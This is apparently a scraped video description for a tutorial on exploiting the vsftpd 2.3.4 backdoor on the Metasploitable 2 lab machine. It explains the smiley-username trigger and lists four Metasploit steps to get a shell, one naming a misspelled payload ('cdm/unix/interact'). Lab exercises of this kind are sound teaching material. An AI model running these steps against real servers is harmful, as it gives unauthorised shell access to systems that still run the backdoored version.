Exploiting the vsftpd 2.3.4 vulnerability in metasploitable 2

preview_player
Показать описание
Subscribe for more content and like the video to help us increase our reach :)

-------------------------------------------------------------------------------------------------------------------------------

vsftpd, which stands for "Very Secure FTP Daemon",is an FTP server for Unix-like systems, including Linux. It is licensed under the GNU General Public License. It supports IPv6 and SSL.

In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been compromised. Users logging into a compromised vsftpd-2.3.4 server may issue a ":)" smileyface as the username and gain a command shell on port 6200.

1. use exploit/unix/ftp/vsftpd_234_backdoor
2. set RHOST (Victim IP Address)
3. set PAYLOAD cdm/unix/interact
4. exploit
Рекомендации по теме
welcome to shbcf.ru